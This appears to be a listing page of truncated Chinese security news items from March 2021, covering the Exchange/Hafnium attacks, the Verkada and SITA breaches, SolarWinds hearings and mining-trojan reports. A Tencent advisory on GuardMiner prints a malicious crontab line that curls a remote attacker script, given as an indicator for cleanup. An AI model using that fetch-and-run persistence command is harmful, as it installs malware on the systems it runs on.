团伙也开始迅速发起攻击。这表明,多名黑客在补丁发布之前就获得了漏洞的细节,这意味着我们可以摒弃他们通过对微软更新进行逆向工程构建漏洞的可能性。 在补丁发布的第 2 天,黑客采取了更加疯狂的攻击,包括 Tonto Team 和 Mikroceen 等团队也对 Exchange 服务器发起攻击。有趣的是,所有这些都是对间谍活动感兴趣的高级持续威胁(APT)组织,除了一个例外(DLTMiner),它与一个已知的加密采矿活动有关。下图是攻击时间线概要。 在过去几天时间里,ESET 研究人员一直在密切关注这些漏洞的 webshell 检测数量。基于 ESET 的遥测数据,在补丁发布日有超过 115 个国家的 5000 多台 Exchange 服务器被标记为 webshell,而实际受感染的服务器数量肯定更多。图 2 展示了微软补丁前后的检测情况。 图 3 的热图显示了根据 ESET 遥测的 webshell 检测的地理分布情况。由于大规模的利用,它很可能代表了全球安装 ESET 安全产品的易受攻击的 Exchange 服务器的分布情况。 ESET 已经确
2021-03-12 12:45:15hackernews.cc
一支安全研究团队近日展示了基于浏览器的全新旁道攻击(Side-channel attack),即便是 JavaScript 在被阻止的情况下也能生效。目前包括英特尔酷睿、AMD Ryzen、三星 Exynos 甚至于苹果自研芯片 M1 这些硬件平台都受到影响。 为了演示该攻击,安全专家开发了一系列对 JavaScript 功能依赖性降低的攻击,这导致了“首个基于浏览器的旁道攻击”,完全由层叠样式表(CSS)和HTML构建,即使在脚本执行被完全阻止时也能工作。 研究人员表示,这个漏洞甚至可以导致微架构站点指纹攻击。站点指纹攻击允许窃听者通过利用目标数据包序列的特征来确定目标的网络活动。这也就有效地无视了大多数隐私保护技术的应用,如VPN、代理,甚至TOR。 根据该演示背后的研究人员发表的一篇论文,Javascript 已经成为进行旁道攻击的一种流行方式。不过通常情况下浏览器会采用某些方法禁止攻击者精确测量时间,而这是基于 JavaScript 的旁道攻击必不可少的。 论文中写道:“旁道攻击者试图绕过这些限制,通过利用其他浏览器API(如消息传递或多线程)创建具有不同精度的临时计时器”。在浏览器为阻止基于 Javascript 的侧通道攻击所做的所有努力中,最简单的选择是完全禁用 Javascript。例如,苹果在 macOS 上的 Safari 设置中提供了一个完全禁用 Javascript 的选项,以此来减轻此类攻击。 尽管如此,来自美国、澳大利亚和以色列的大学研究人员展示的新形式的攻击依然是有效的,因为它只依赖于 CSS 和 HTML,这使它成为第一个在苹果 M1 芯片上工作的旁道攻击。根据研究论文,分析的重点是 Prime + Probe ,这是一种缓存旁道攻击,它拥有检测目标访问哪些缓存集的能力,然后可以用来洞察目标的情况。 研究人员表示:“除了受到防御措施的影响,微架构攻击还受到消费类设备硬件多样化程度提高的影响。高端处理器市场过去一直由英特尔主导,但过去几年,其他替代产品的普及率越来越高,比如AMD的Zen架构、三星的Exynos,以及最近推出的苹果M1内核”的。 为此研究人员对 AMD 的 Ryzen、三星的 Exynos 和苹果的 M1 芯片进行了攻击评估。结果表明,和英特尔的同类产品相比,有时候攻击在苹果和三星这些新型 CPU 上更加有效,这可能是由于它们的缓存替换策略更简单。 攻击的成功程度取决
2021-03-11 10:44:41hackernews.cc
据悉,美国现任总统乔·拜登(Joe Biden)任命克莱尔·马托拉纳(Clare Martorana)为美国首席信息官(Chief Information Officer),负责全面监管美国白宫升级政府技术基础设施的工作。Martorana 是美国数字服务部门的资深人士,上任之后将负责加强联邦政府的网络安全,实现 IT 系统的现代化,并使所有公民更容易访问政府网站。 Martorana 还将会负责确保数字选举信息和网上选民登记对每个人都是无障碍的,包括残疾人和英语理解能力有限的人。这部分职责对拜登来说尤为重要,他最近发布了一项旨在加强投票权的行政命令。 Martorana 曾在人事管理办公室担任同样的职位,她有十多年在健康技术公司担任高管的经验,包括 WebMD 和 Everyday Health。2016 年 10 月,她加入了美国退伍军人事务部(USDS)的团队,领导了该机构数字基础设施的现代化工作,并使退伍军人更容易在线访问和管理他们的福利。 在退伍军人事务部,Martorana 利用以人为本的设计原则,让退伍军人参与到设计和开发技术的过程中。Martorana 和 USDS 设计总监 Kat Jurick 在谈到他们在该机构 2019 年的工作时写道:“从重建面向退伍军人的应用程序到创建个性化的仪表板,退伍军人可以在一个地方看到他们的福利,我们的方法是相同的:退伍军人是我们所做的每一个决定的中心”。 现在,Martorana 将承担更大的挑战。目前肆虐美国的新冠疫情凸显了很多政府网站在处理紧急实物方面的补足,使用 60 年前编程语言创建的失业门户网站在高需求下崩溃;全国疫苗推广也需要一个全面的政府数据库。除了疫情,美国政府最近还遭遇了历史上最严重的网络安全漏洞之一–SolarWinds黑客事件,11个政府机构被渗透。           (消息及封面来源:cnBeta)
2021-03-10 14:24:03hackernews.cc
由于更多的黑客组织涌入,试图在受影响的公司为其服务器打补丁之前趁虚而入,微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露,黑客组织 “Hafnium”的攻击目标是微软Exchange服务器的漏洞,促使微软发布补丁。 漏洞公布后不久,Hafnium加强了攻击力度,在几天内袭击了3万家美国机构和世界各地的其他机构,但现在其他机构也加入了战团。安全专家告诉《金融时报》,更多的黑客组织正在利用这个机会,利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们,都是在托管服务器的组织打上补丁和保护之前,利用软件漏洞介入的。 对许多人来说,现在先发制人地修补这个问题可能为时已晚。”每一个可能的受害者,如果在上周中到年底还没有打补丁,就已经被至少一个或几个行为者命中了,”安全组织CrowdStrike联合创始人Dmitri Alperovitch这样表示。 在美国之外,欧洲银行业管理局成为第一个确认受到攻击的主要公共机构。 膨胀的攻击规模将在一段时间内成为一个严重的问题,促使政府进行干预。网络安全和基础设施安全局(CISA)已经敦促 “所有部门的所有组织遵循指导,以解决国内和国际上广泛存在的漏洞”。 还有人建议使用微软的IOC检测工具来确定是否发生了脆弱系统的入侵。同时白宫国家安全委员会声称:”任何拥有脆弱服务器的组织都必须立即采取措施,确定是否已经成为目标。”           (消息来源:cnBeta;封面源自网络)
2021-03-10 14:24:03hackernews.cc
北京时间3月10日消息,一群黑客表示,他们已经入侵了硅谷监控创业公司Verkada收集的海量监控摄像头数据,能够看到医院、公司、警局、监狱以及学校内部的15万个监控摄像头的实时录像情况。 监控视频被曝光的企业包括特斯拉、软件提供商Cloudflare。此外,黑客还能够看到女子卫生诊所、精神病院以及Verkada本身办公室内部的视频。其中一个视频拍摄自特斯拉上海仓库内部,能够看到装配线上的工人。黑客称,他们能够访问特斯拉工厂和仓库内的222个摄像头。 Verkada代表在一份声明中称:“我们已经禁用了所有内部管理员账户来防止任何未经授权的访问。我们的内部安全团队和外部安全团队正在调查这一潜在问题的规模和范围。”特斯拉、Cloudflare等尚未置评。           (消息来源:cnBeta;封面源自网络)
2021-03-10 11:23:58hackernews.cc
一、概述 腾讯安全威胁情报中心检测到GuardMiner挖矿木马团伙新的攻击活动,该团伙利用Elasticsearch远程代码执行漏洞(CVE-2015-1427)等9种漏洞武器针对云上主机发起攻击。根据检测数据推算,受害主机已过万台,该挖矿木马会卸载云主机安装的安全软件。腾讯安全专家建议企业安全运维人员积极修复服务器组件漏洞,避免使用弱口令,防止云主机被该团伙使用的漏洞武器攻陷。 GuardMiner最早出现于2019年,至今已活跃超过2年,该挖矿木马通过Go语言编写的二进制程序针对Windows平台和Linux平台进行攻击传播,通过crontab定时任务以及安装SSH公钥后门进行持久化控制,并且还会利用比特币的交易记录来动态更新C2地址。 分析发现,GuardMiner挖矿团伙最新的攻击活动利用了多达9种攻击传播手法: 1)    CCTV设备RCE漏洞; 2)    Redis未授权访问漏洞; 3)    Drupal框架CVE-2018-7600漏洞; 4)    Hadoop未授权访问漏洞; 5)    Spring RCE漏洞CVE-2018-1273; 6)    Thinkphp V5高危漏洞; 7)    WebLogic RCE漏洞CVE-2017-10271; 8)    SQL Server弱口令爆破; 9)    Elasticsearch RCE漏洞 CVE-2015-1427、CVE-2014-3120 GuardMiner挖矿团伙入侵云主机后的挖矿行为会对服务器性能产生严重负面影响,服务器的正常业务有中断或崩溃风险。挖矿团伙在失陷服务器留置后门,关闭linux防火墙、卸载云服务器安全软件等行为,会导致服务器安全性受损,增加被其他黑客组织攻击的风险。 排查和加固 由于GuardMiner掌握较强的自动化攻击和扩散感染能力,腾讯安全专家建议企业及时检查以下位置并进行清理,同时对服务器使用的相关组件进行版本检查和漏洞修复,对于Redis、SQL Server使用的弱密码尽快予以纠正。 文件和进程 /etc/phpguard /etc/phpupdate /etc/networkmanager Crontab任务: */30 * * * * sh /etc/newdat.sh */2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.s
2021-03-09 10:23:27hackernews.cc
上周五,网络安全记者布莱恩·克雷布斯(Brian Krebs)和安迪·格林伯格(Andy Greenberg)报道称,在一次前所未有的电子邮件服务器攻击中有多达 3 万个组织受到影响。不过在上周末评估的最新数据,全球有超过 6 万个微软 Exchange 服务器客户被黑客攻击,欧洲银行业管理局承认是受害者之一。 Krebs 目前已经梳理了大规模 Exchange 服务器入侵事件的基本时间表,表示微软早在今年 1 月就已意识到这些漏洞。而首个安全补丁是在将近 2 个月之后才发布的,同时官方还发布了一篇博客文章,但没有解释攻击的范围和规模。甚至于微软原本计划将该补丁放在补丁星期二活动日上推出,但鉴于漏洞影响太大,所以才提前 1 周放出。 MIT Technology Review 报道称,除了主要黑客团体 Hafnium 之外,至少有 5 个黑客团体正在利用 Exchange 服务器的漏洞。目前美国政府官员正在争分夺秒的部署措施,一位官员告诉Cyberscoop,这是“A Big F-ing Deal”。 白宫新闻秘书 Jen Psaki 称这是“一个活跃的威胁”,让人们更加关注国土安全部网络安全机构3月3日发出的紧急指令。白宫国家安全顾问杰克-沙利文也对此提出了警告,前网络安全和基础设施安全局局长克里斯托弗-克雷布斯和白宫国家安全委员会也提出了警告。 Chris Krebs 在推文中写道:“这事情大条了。如果你的组织运行一个暴露在互联网上的OWA服务器,假设在02/26-03/03之间被入侵。检查C:\\inetpub\wwwroot\aspnet_client/system_web中的8个字符aspx文件。如果你搜索到了,你就进入了事件响应模式。” 国家安全委员会在推文中写道:“ 如果服务器已经被入侵,打补丁和缓解措施并不是补救措施。任何拥有易受攻击服务器的组织必须立即采取措施,以确定它们是否已经成为目标”。         (消息来源:cnBeta;封面源自网络)  
2021-03-09 10:23:27hackernews.cc
微软和英特尔已经签署了一项协议以帮助国防高级研究计划局(DARPA)开发一种完全同态加密(FHE)解决方案,该方案将消除数据必须解密才能处理等几个薄弱环节。通过FHE,可以对加密信息进行计算,这将消除解密数据的风险,但如今要实现它需要的计算能力非常大。 为了解决这个问题,DARPA启动了虚拟环境中的数据保护(DPRIVE)计划,英特尔和微软将参与该计划,致力于开发FHE计算的硬件加速器。 据英特尔公司介绍,DPRIVE计划将由几个阶段组成,包括设计、开发和验证将用于硬件的IP块和完整的软件栈。在核心开发工作之外,两家公司将与标准机构合作,围绕FHE制定标准。英特尔表示,也将继续投入资金进行FHE技术的学术研究。 在讨论项目面临的挑战时,DARPA项目经理Tom Rondeau说:”我们目前估计,我们在FHE世界中的计算速度要比在明文世界中的计算速度慢一百万倍。DPRIVE的目标是将FHE降低到我们在明文中看到的计算速度。如果我们能够实现这一目标,同时将技术定位为规模化,DPRIVE将对我们保护和维护数据和用户隐私的能力产生重大影响。” 微软方面表示,很高兴能将其在云计算和同态加密方面的专业知识带到这里。利用英特尔的硬件专长,微软希望能够帮助开发出一种适合商业用途的技术,以弥补 “数据保密性的最后一英里差距”。         (消息及封面来源:cnBeta)
2021-03-08 10:42:46hackernews.cc
本周五,一位知情人士表示,微软(Microsoft Corp.)电子邮件软件中的一个漏洞遭黑客攻击,超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司(SolarWinds Corp)下载的所有受污染代码,该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。   美国调查记录显示,最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示,来自亚洲和欧洲的数万个组织也受到了影响。 尽管微软本周二发布了紧急补丁,但黑客攻击仍在继续。 微软最初曾表示,此次黑客攻击是“有限的、有针对性的攻击”,周五却拒绝就问题的规模置评。不过微软公司也表示正与政府机构和安全公司合作,为客户提供帮助。 此外,微软公司补充说,“受到影响的客户应联系我们的支持团队,以获得额外的帮助和资源。” 对连接设备的一次扫描显示,截至本周五,只有10%的易受攻击的设备安装了补丁,不过这一数字还在上升。 由于安装补丁并不能彻底消除漏洞,美国官员正在努力研究如何通知所有受害者,并指导他们进行黑客追捕。 所有受影响的公司似乎都在自己的机器上运行了电子邮件客户端Outlook的Web版本,而不是依赖云提供商。记录显示,后者可能会使许多大公司和联邦政府机构幸免于难。 美国联邦网络安全与基础设施安全局(Federal Cybersecurity and Infrastructure Security Agency)没有回应置评请求。 本周五早些时候,白宫新闻秘书Jen Psaki对记者表示,目前在微软广泛使用的Exchange服务器上发现的漏洞是“重大的”,且“可能产生深远的影响”。 Psaki表示:“我们担心受害者的队伍过于庞大。” 微软和参与美国回应工作的人士将第一波黑客攻击归咎于一名有中国政府背景的演员。但一名中国政府发言人表示,中国不是此次黑客入侵事件的幕后黑手。 从去年年底开始的针对几个典型间谍目标的控制性攻击,已经在上个月发展成为了一场广泛的战役。安全官员表示,这意味着除非中国改变了策略,否则第二个组织可能已经参与其中。 随着用来控制邮件服务器代码的不断传播,预计未来还会有其他黑客发起更多的攻击。 政府工作人员表示,目前黑客们只是利用漏洞重新进入并在受感染的网络中移动,这只占很小比例,可能不到十分之一。 他说:“目前有几百人正在以最快的速度利用它们,窃取数据,并安装其他方法,以便稍后返回。” 最初的攻击途
2021-03-08 10:22:44hackernews.cc
微软Exchange服务器的独立安装存在一系列缺陷,这导致了一场规模庞大的网络安全事件,有几十万台Exchange服务器的安装被黑客组织Hafnium入侵。Krebs on Security报道称,大量的小企业、城镇、城市和地方政府已经被感染,黑客在盗取了数据之余还留下了一个Web Shell,以便进一步指挥和控制。 为了快速帮助潜在受害者判断和解决问题,今天,微软发布了新的工具和指南,帮助服务器管理员检测和减轻威胁。 首先最重要的是,微软发布了免费的Exchange服务器 “入侵指标”工具的更新,该工具可用于扫描Exchange服务器的日志文件,以识别它们是否受到了入侵。 下载地址: https://github.com/microsoft/CSS-Exchange/tree/main/Security 微软还发布了紧急替代缓解指南,供无法应用微软已于3月2日发布的内置独立更新的管理员使用。然而应用补丁仍然是最有效的预防措施,如果你的服务器被感染,全面补救将是一项更大的工作。 “到目前为止,我们已经处理了几十个案例,早在2月28日[微软宣布其补丁之前],一直到现在,”发现攻击的Volexity总裁Steven Adair说。”即使你在微软公布补丁的同一天打了补丁,你的服务器上仍然很有可能存在一个web shell。事实是,如果你正在运行Exchange,而你还没有打补丁,那么你的网络组织很有可能已经被入侵。” “最好的保护是尽快在所有受影响的系统中应用更新,”微软发言人在一份书面声明中说。”我们将继续通过提供额外的调查和缓解指导来帮助客户。受影响的客户应该联系我们的支持团队,以获得额外的帮助和资源。”           (消息来源:cnBeta;封面源自网络)  
2021-03-05 10:34:37hackernews.cc
应用开发者往往依赖第三方服务器来简化数据存储,但最新研究表明很多时候这些服务器对敏感数据并未提供完善的安全保护。来自亚马逊、谷歌和微软的第三方服务提供存储用户数据和系统文件的简单方式,开发者就不需要自己费力地对服务器进行编码。但开发者往往没有对这些服务器提供妥善的安全的保护,让用户数据处于开放状态,从而给黑客有乘之机。 根据市场调查机构 Zimperium 发布的最新研究表明,不管供应商是谁这种情况都时有发生。他们调查统计之后发现,14% 使用云存储的 iOS 和 Android 应用程序都有不安全的配置,非常容易受到攻击。 研究指出,这些服务器中可用的数据类型取决于相关应用,但所有存储的数据都可能被黑客使用。这些不安全的数据涵盖了从姓名和地址到每个用户的医疗和财务数据。 Zimperium表示,漏洞和数据被暴露后,可以用来获取更多敏感数据和操作流程。一些应用程序泄露了整个云基础设施脚本,包括SSH密钥和支付 kiosks 的密码。 Zimperium 对使用公共云服务的 8.4 万个 Android 应用和 4.7 万个 iOS 应用进行了调查之后得出以上结果的。在这些使用服务的应用中,有14%的应用暴露了用户数据。 Zimperium 的首席执行官 Shridhar Mittal 表示:“这是一个令人不安的趋势。很多这些应用的云存储都没有被开发者或负责人正确配置,正因为如此,数据对几乎任何人都是可见的。而我们大多数人现在都有一些这样的应用”。问题在于开发者没有保护好自己的服务器,所以任何和所有的应用类别都会受到影响。研究发现受影响最大的类别包括商业、购物、社交、通信和工具。       (消息及封面来源:cnBeta)
2021-03-05 10:34:37hackernews.cc
全球航空运输数据巨头SITA公司已经证实了一起涉及乘客数据的数据泄露事件。该公司周四在一份简短的声明中表示,该公司已成为“网络攻击的受害者”,存储在其美国服务器上的某些乘客数据已被泄露。2月24日该公司证实了这一网络攻击事件,之后其联系了受影响的航空公司。 SITA是全球最大的航空IT公司之一,据说为全球约90%的航空公司提供服务,这些航空公司依靠该公司的旅客服务系统Horizon来管理订票、售票和飞机起飞。但目前仍不清楚到底有哪些数据被访问或被盗。 当联系到SITA时,SITA发言人Edna Ayme-Yahil以正在进行的调查为由,拒绝透露被盗取的具体数据。该公司表示,该事件“影响到全球各个航空公司,而不仅仅是美国的航空公司”。 SITA确认已经通知了几家航空公司–这包括马来西亚航空;芬兰航空;新加坡航空;以及韩国的济州航空,这些航空公司已经就此次事件发表了声明。但SITA拒绝透露其他受影响的航空公司的名字。 在TechCrunch看到的一封给受影响客户的电子邮件中,新加坡航空公司表示,它不是SITA的Horizon乘客服务系统的客户,但约有50万名常旅客会员的会员号和层级身份被泄露。该航空公司表示,转移这类数据是“为了能够验证会员层级状态,并在旅行时给予会员航空公司的客户相关优惠”。该航空公司表示,乘客的行程、预订、票务和护照数据没有受到影响。 SITA是航空市场上少数几家为航空公司提供客票和预订系统的公司之一,与Sabre和Amadeus并列。 Sabre在2017年年中报告了一起影响其酒店预订系统的重大数据泄露事件,黑客获取了超过100万张客户信用卡数据。这家总部位于美国的公司在12月同意240万美元的和解协议,并在泄露事件发生后对其网络安全政策进行修改。 2019年,有安全研究人员发现,法航、英航和澳航等公司使用的Amadeus乘客预订系统存在漏洞,这使得该公司很容易更改或获取旅客记录。         (消息来源:cnBeta;封面源自网络)
2021-03-03 10:36:26hackernews.cc
伴随着 iOS 系统功能的日趋完善和丰富(例如小部件和深色模式),iPhone 用户也不再执着于越狱了。不过上周末,知名 iPhone 破解团队 unc0ver 发布了最新 6.0.1 版越狱工具,适用于运行 iOS 11 至 iOS 14.3 的 iPhone。 这款越狱工具是该团队基于 CVE-2021-1782 漏洞自主开发的,该漏洞目前已经在 iOS 14.4 版本中修复。该越狱工具适用于 iPhone 6s 及后续产品、iPad Air 2 及后续产品、iPod Touch(第 7 代)。不过需要注意的是,越狱之后如果设备遭到恶意应用程序攻击可能也会获得更高的权限。 你可能还记得,当苹果公司透露上个月发现了被黑客积极利用的漏洞时,我们建议 iPhone 用户尽快更新到 iOS 14.4。看来越狱和苹果的报告很有可能有关,但苹果永远不会肯定证实这一点。         (消息来源:cnBeta;封面源自网络)
2021-03-02 11:38:29hackernews.cc
在 Palar 被关闭之后,大量用户涌向了一个类似的平台–Gab,不过该平台近日遭到了黑客攻击。超过 1.5 万名 Gab 用户的公共和个人信息被窃取。援引 Wired 报道,该黑客利用 SQL 注入漏洞从后台数据库中窃取了大约 70GB 的平台用户数据,包含该网站的 4000 多万条帖子。 这些数据包括 1.5 万名 Gab 用户的公共、私人互动,并详细说明了用户的个人资料、哈希密码和组别的纯文本密码。而在泄漏的用户中,包括前美国总统特朗普、MyPillow 首席执行官迈克-林德尔,国会女议员马乔里-泰勒-格林和 Infowars 主持人亚历克斯-琼斯等知名人士的账户。不过,该公司否认自己遭遇了数据泄露,并向 Gab 用户保证,他们的密码没有被泄露。 反保密活动组织 DDoSecrets 已经将这些数据汇编成了一个名为 GabLeaks 的东西,打算将其提供给选定的记者、社会科学家和研究人员进行进一步分析。这引起了 Gab 首席执行官安德鲁-托巴的回应,他将这些黑客活动家描述为 “精神病 “恶魔。       (消息及封面来源:cnBeta)
2021-03-01 12:17:45hackernews.cc
根据网络安全公司 Intezer 本周发布的一份报告,自 2017 年以来使用 Go 编程语言编写的恶意软件数量呈现爆发式增长,增幅超过 2000%。从报告中可以看到,恶意软件作者已逐渐从 C/C++ 转向 Go,这是一种由谷歌在 2007 年开发并推出的编程语言。 虽然首个基于 Go 语言开发的恶意软件在 2012 才被检测到,但在短短几年时间里该语言已经在恶意软件领域快速流行起来。Intezer 在报告中说:“在 2019 年之前,发现用 Go 编写的恶意软件更多的是一种罕见的现象,而在 2019 年期间,它变成了一种日常现象”。 如今,Golang(Go 的另一种称呼)已经取得了突破性进展,并被广泛采用。有国家背景的黑客组织(比较出名的有 APT)、网络犯罪运营商,甚至安全团队都在使用它,他们经常用它来创建渗透测试工具包。 Golang 之所以会出现这种突然暴涨的现象,主要有三个原因。首先是 Go 支持跨平台编译的简易流程。这使得恶意软件开发者只需编写一次代码,就可以从同一个代码库中编译出多个平台的二进制文件,使他们可以从同一个代码库中针对 Windows、Mac和Linux,这种多功能性是其他许多编程语言通常不具备的。 第二个原因是,基于 Go 的安装文件仍然很难被安全研究人员分析和逆向工程,这使得基于Go的恶意软件的检出率一直很低。第三个原因与 Go 对网络数据包和请求工作的支持有关。 Intezer解释说:“Go有一个非常好写的网络堆栈,很容易使用。Go已经成为云的编程语言之一,很多云原生应用都是用它编写的。例如,Docker、Kubernetes、InfluxDB、Traefik、Terraform、CockroachDB、Prometheus和Consul都是用Go编写的。这很有意义,因为创建Go背后的原因之一是发明一种更好的语言,可以用来取代谷歌内部使用的C++网络服务”。         (消息及封面来源:cnBeta)
2021-03-01 12:17:45hackernews.cc
一名法官已经批准了Facebook价值6.5亿美元的和解协议,以结束一场隐私诉讼,该诉讼指控该社交网络未经许可就在其iPhone应用上存储的用户照片上使用面部识别技术。这起始于2015年4月的诉讼指控Facebook没有获得用户同意在他们的照片上使用其面部标签功能。 官司起初由芝加哥律师Jay Edelson代表原告Carlo Licata提起,诉状称伊利诺伊州的隐私法不允许使用未经同意的标签功能。 据《芝加哥论坛报》报道,此案起源于库克县巡回法院,然后转到芝加哥联邦法院再到加州。诉讼到达加州后,该诉讼获得了集体诉讼地位。 该集体诉讼构成了涉及伊利诺伊州约690万Facebook用户的庞大官司,Facebook在2011年6月7日之后为其创建并存储了人脸模板。在11月23日的加入截止日期前,有近160万份索赔表被提交,约占潜在集体成员的22%。申诉书称,Facebook违背了伊利诺伊州生物识别信息隐私法,该法是美国最严厉的隐私法之一。该法案的一部分要求公司在能够开始使用生物识别系统与用户的数据之前,必须获得用户的许可,其中包括面部识别系统。 联邦地区法官詹姆斯-多纳托(James Donato)称这一和解是同类和解中最大的隐私和解案之一,对集体诉讼成员来说是一个 “里程碑式的结果”。”总的来说,该和解是消费者在数字隐私这一备受争议的领域的重大胜利,”多纳托说。 在6.5亿美元的和解金中,每个集体诉讼成员预计将获得至少345美元,而三名指定原告将分别获得5000美元。律师Edelson将获得9750万美元的律师费和约91.5万美元的费用。 支票可能会在两个月内寄给集体成员,不过仍有可能对裁决提出上诉,从而延长案件的审理时间。和解消息传来之际,Facebook正因其迫在眉睫的隐私相关变化而不断攻击苹果公司。由于担心iOS 14的应用追踪透明度中的追踪功能减少可能导致广告收入的损失,Facebook通过广告活动攻击苹果,将这些变化诉称为对小企业不利。 还有报道称,Facebook首席执行官马克-扎克伯格(Mark Zuckerberg)多次被苹果的隐私立场激怒,他想给这家iPhone制造商 “施加痛苦”。 这并不是Facebook面临的唯一一起关于其生物识别数据使用的隐私诉讼。2020年8月,它在加州红木城州法院被起诉,原因是它涉嫌 “
2021-03-01 10:58:07hackernews.cc
SolarWinds的现任和前任高层管理人员正在指责一名公司实习生在密码安全方面的严重失误,问题密码 “solarwinds123″于2019年在公共互联网上被一名独立的安全研究人员发现,该研究人员警告公司,该密码的泄露暴露了SolarWinds的文件服务器。周五,在众议院监督委员会和国土安全委员会的联合听证会上,几位美国议员就密码问题向SolarWinds开炮。 “我有一个比’solarwinds123’更强的密码,以阻止我的孩子在iPad上看太多YouTube,”众议员Katie Porter说。”然而你和你的公司本来是要防止俄罗斯人阅读国防部的电子邮件的!” 微软总裁布拉德-史密斯(Brad Smith)也在周五的听证会上作证,他后来表示,没有证据表明五角大楼实际上受到了俄罗斯间谍活动的影响。微软是牵头对黑客活动进行取证调查的公司之一。微软告诉立法者,有 “实质性证据 “证明俄罗斯是破坏性黑客的幕后黑手。 SolarWinds代表周五告诉立法者,密码问题一经报告,就在几天内得到纠正。 但目前仍不清楚在美国历史上最严重的安全漏洞之一中,泄露的密码可能在使疑似俄罗斯黑客监视多个联邦机构和企业方面扮演了什么角色(如果有的话)。窃取的凭证是SolarWinds正在调查的三种可能的攻击途径之一,因为它试图发现它是如何首先被黑客入侵的,黑客继续在软件更新中隐藏恶意代码,然后SolarWinds向大约18000名客户推送,包括许多联邦机构。 SolarWinds首席执行官Sudhakar Ramakrishna表示,SolarWinds正在探索的其他理论包括粗暴地猜测公司密码,以及黑客可能通过受损的第三方软件进入。 面对众议员Rashida Tlaib的质询,SolarWinds前CEO Kevin Thompson表示,密码问题是 “一个实习生犯的错误”。”他们违反了我们的密码政策,他们在内部、在自己的私人Github账户上发布了这个密码,随后被发现并引起我的安全团队的注意,他们就把那东西撤下来了。”Thompson和Ramakrishna都没有向立法者解释为什么公司的技术首先允许使用这样的密码。Ramakrishna后来作证说,这个密码早在2017年就
2021-02-26 17:16:04hackernews.cc
一、摘要 2020年各类数字加密货币价格迎来暴涨,比特币价格一度超过5万美元/BTC,市值达到9200亿美元,是2019年底的10倍之多,达到了历史最高点。同期挖矿木马最偏好的门罗币价格也同步增长6倍,这意味着黑客通过进行门罗币挖矿,兑现后收益可达到以往收益的6倍。 在如此大利益诱惑之下,黑产团伙已闻风而动,纷纷加入了对主机计算资源的争夺。一个典型现象就是,有大量挖矿木马在运行时,会尝试清除竞争对手木马。 门罗币价格曲线(数据来源:coinmarketcap.com) 根据腾讯安全威胁情报中心的检测数据,2020年挖矿木马上升趋势十分明显。 2020年挖矿木马增长趋势 本报告以腾讯安全产品获取的安全事件告警工单数据为基础,统计分析得出2020年挖矿木马的活跃家族TOP榜,从挖矿木马主要入侵特点、漏洞利用偏好、持久化运行手段等方面展示其主要威胁,预测未来挖矿木马攻击可能呈现的新趋势,给政企机构安全运维团队提供常见挖矿木马的防御清理建议。 二、挖矿木马风险 1.1 挖矿家族TOP榜 2020年度挖矿木马家族排名前三的分别为DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner,榜单中有通过永恒之蓝漏洞传播的为DTLMiner、NSABuffMiner、NSAGluptebaMiner,有利用Redis、Hadoop、Weblogic、Drupal、thinkphp等应用程序漏洞传播的为H2Miner、GuardMiner、z0Miner、8220Miner等家族,以及主要通过弱口令爆破进行传播的为KoiMiner家族。 1.2 挖矿木马的危害 挖矿木马最容易被感知到的影响就是服务器性能会出现严重下降,从而影响服务器业务系统的正常运行,严重时可能出现业务系统中断或系统崩溃。如下图所示案例,H2Miner挖矿木马运行时占用了98%的CPU资源,系统性能已严重受损。 其次,挖矿木马威胁事件往往伴随着攻击者组建僵尸网络。感染挖矿木马的同时,服务器已成为黑客控制的肉鸡电脑,除了硬件资源被浪费,黑客还可能利用失陷主机对其他目标进行攻击,包括蠕虫式的横向攻击扩散、对特定目标进行DDoS攻击、作为黑客下一步攻击的跳板隐藏攻击者线索或攻击真实意图、将失陷主机作为分发木马的下载服务器或C2服务器等等。 第三,失陷主机可能造成信息泄露。攻击者入侵成功,很多情况下已获得服务器的完全权限,只要攻击者愿意,就可能盗取服务器